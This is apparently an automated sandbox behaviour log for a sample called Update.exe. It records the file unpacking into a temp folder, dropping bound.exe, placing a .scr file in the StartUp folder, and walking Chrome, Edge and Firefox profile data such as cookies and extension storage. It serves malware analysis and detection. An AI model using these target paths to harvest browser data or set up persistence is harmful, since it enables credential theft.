                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522\_queue.pyd VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\Desktop\Update.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\Desktop\Update.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\Desktop\Update.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\Desktop\Update.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522 VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522 VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\Desktop\Update.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\Desktop\Update.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\Desktop\Update.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\Desktop\Update.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\Desktop\Update.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522\bound.blank VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522\bound.blank VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522\bound.blank VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\bound.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\Desktop\Update.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\Desktop\Update.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\Desktop\Update.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\Desktop\Update.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522\base_library.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\Desktop\Update.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522 VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68522\unicodedata.pyd VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Temp VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\AutoItX VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CertificateRevocation VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CertificateRevocation VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CommerceHeuristics VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CommerceHeuristics VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\reports VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crowd Deny VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crowd Deny VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\fccd7e85-a1ff-4466-9ff5-c20d62f6e0a2 VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\fccd7e85-a1ff-4466-9ff5-c20d62f6e0a2 VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\content-prefs.sqlite VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0 VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0 VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CertificateRevocation VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\af VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\af VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crowd Deny VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\favicons.sqlite VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\fccd7e85-a1ff-4466-9ff5-c20d62f6e0a2 VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\am VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\CertificateRevocation VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\am VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ar VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\az VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\be VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\attachments VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\bn VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\az VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\attachments VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\7-Zip VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\AutoItX VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\AutoItX VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Cache VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\cy VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Cache VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\af VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\am VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fil VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fr VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\hi VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\hu VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\hy VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js\index-dir VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\is VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\be VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\bn VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office Tools VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\iw VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ja VolumeInformationJump to behavior
